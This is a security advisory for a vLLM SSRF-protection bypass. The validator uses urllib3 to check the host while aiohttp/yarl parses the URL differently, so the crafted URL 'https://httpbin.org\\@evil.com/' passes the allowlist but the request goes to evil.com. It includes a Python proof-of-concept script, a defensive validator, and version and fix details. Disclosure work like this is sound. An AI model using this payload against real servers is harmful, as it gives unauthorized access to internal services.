GHSA-v359-jj2v-j536

Published: 09 Mar 2026
Source: github
GitHub: Reviewed
CVSS3: 5.4

Description

vLLM has SSRF Protection Bypass

Summary

The SSRF protection fix for https://github.com/vllm-project/vllm/security/advisories/GHSA-qh4c-xf7m-gxfc can be bypassed in the load_from_url_async method due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client.

Affected Component

  • File: vllm/connections.py
  • Function: load_from_url_async

Vulnerability Details

Root Cause

The SSRF fix uses urllib3.util.parse_url() to validate and extract the hostname from user-provided URLs. However, load_from_url_async uses aiohttp for making the actual HTTP requests, and aiohttp internally uses the yarl library for URL parsing.

These two URL parsers handle backslash characters (\) differently:

Parser               | Input URL                        | Parsed Host  | Parsed Path     | Behavior
urllib3.parse_url()  | https://httpbin.org\@evil.com/   | httpbin.org  | /%5C@evil.com/  | URL-encodes \ as %5C, treats \@evil.com/ as part of the path
yarl (via aiohttp)   | https://httpbin.org\@evil.com/   | evil.com     | /               | Treats \ as part of userinfo (user: httpbin.org\), the @ acts as the userinfo/host separator

Attack Scenario

    import asyncio
    import aiohttp
    import urllib3.util

    # Attacker provides this URL
    malicious_url = "https://httpbin.org\\@evil.com/"

    # 1. Validation layer (urllib3.parse_url)
    parsed = urllib3.util.parse_url(malicious_url)
    # parsed.host == "httpbin.org"  ✅ Passes validation

    # 2. Actual request (aiohttp with yarl)
    async def fetch():
        async with aiohttp.ClientSession() as session:
            async with session.get(malicious_url) as response:
                # Request actually goes to evil.com! ❌ Bypass!
                return response.status

    asyncio.run(fetch())

Why This Happens

  1. yarl: Interprets httpbin.org\ as the userinfo component, and @ as the userinfo/host separator, so the URL is parsed as user=httpbin.org\, host=evil.com, path=/
  2. urllib3: URL-encodes the backslash as %5C, so \@evil.com/ becomes /%5C@evil.com/ which is treated as part of the path, leaving host=httpbin.org

This inconsistency allows an attacker to:

  • Bypass the hostname allowlist check
  • Access arbitrary internal/external services
  • Perform full SSRF attacks
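As an added example (not vLLM's code and not the advisory's fix), the check below shows the defender-side lesson of this advisory: the host an allowlist is compared against must not come from a parser whose view of the authority can differ from the HTTP client's, so the authority is required to be a plain host[:port] with no userinfo, backslash or escaping before any allowlist comparison. The names safe_host and parser_views, and the allowlisted hostnames, are hypothetical; only the standard library is required, the optional urllib3/yarl lookups are skipped when those packages are absent.

```python
from __future__ import annotations

import re
from typing import Optional
from urllib.parse import urlsplit

# Only an unambiguous host[:port] is accepted: letters, digits, dots,
# hyphens and an optional numeric port. "@", "\", "%", "[" and spaces
# are all rejected before the allowlist is consulted.
_STRICT_AUTHORITY = re.compile(
    r"^(?P<host>[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?)(?::(?P<port>\d{1,5}))?$"
)


def safe_host(url: str, allowed_hosts: frozenset) -> Optional[str]:
    """Return the allowlisted hostname for ``url``, or None if rejected."""
    if url != url.strip() or any(ch in url for ch in "\\\t\r\n"):
        return None  # backslash or whitespace anywhere: ambiguous, reject
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or "://" not in url:
        return None
    # Raw authority text (up to the first "/", "?" or "#"), independent of
    # any parser's netloc heuristics; it must equal what urlsplit saw.
    raw_authority = re.split(r"[/?#]", url.split("://", 1)[1], 1)[0]
    if raw_authority != parts.netloc:
        return None
    m = _STRICT_AUTHORITY.match(raw_authority.lower())
    if m is None:
        return None  # userinfo, IPv6 brackets, percent-encoding, etc.
    host = m.group("host")
    return host if host in allowed_hosts else None


def parser_views(url: str) -> dict:
    """Hostname as seen by each parser that is importable, to make the
    differential visible: the stdlib (and yarl, when installed) report
    the post-"@" host, while urllib3 keeps the pre-backslash host."""
    views = {"stdlib": urlsplit(url).hostname}
    try:
        import urllib3.util  # optional, third-party
        views["urllib3"] = urllib3.util.parse_url(url).host
    except ImportError:
        pass
    try:
        import yarl  # optional, third-party (used inside aiohttp)
        views["yarl"] = yarl.URL(url).host
    except ImportError:
        pass
    return views
```

Running safe_host on the advisory's URL returns None whichever parser the client uses, while a plain https://httpbin.org/... URL passes with host httpbin.org.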

Fixes

Packages

Name: vllm (pip)
Affected versions: >= 0.15.1, < 0.17.0
Fixed version: 0.17.0

EPSS

Percentile: 6%
0.00021
Low

CVSS3: 5.4 Medium

Weaknesses

CWE-918

Related vulnerabilities

CVSS3: 7.1
redhat
19 days ago

vLLM is an inference and serving engine for large language models (LLMs). The SSRF protection fix for CVE-2026-24779 added in 0.15.1 can be bypassed in the load_from_url_async method due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client. The SSRF fix uses urllib3.util.parse_url() to validate and extract the hostname from user-provided URLs. However, load_from_url_async uses aiohttp for making the actual HTTP requests, and aiohttp internally uses the yarl library for URL parsing. This vulnerability is fixed in 0.17.0.

CVSS3: 7.1
nvd
19 days ago

vLLM is an inference and serving engine for large language models (LLMs). The SSRF protection fix for CVE-2026-24779 added in 0.15.1 can be bypassed in the load_from_url_async method due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client. The SSRF fix uses urllib3.util.parse_url() to validate and extract the hostname from user-provided URLs. However, load_from_url_async uses aiohttp for making the actual HTTP requests, and aiohttp internally uses the yarl library for URL parsing. This vulnerability is fixed in 0.17.0.

CVSS3: 7.1
debian
19 days ago

vLLM is an inference and serving engine for large language models (LLM ...
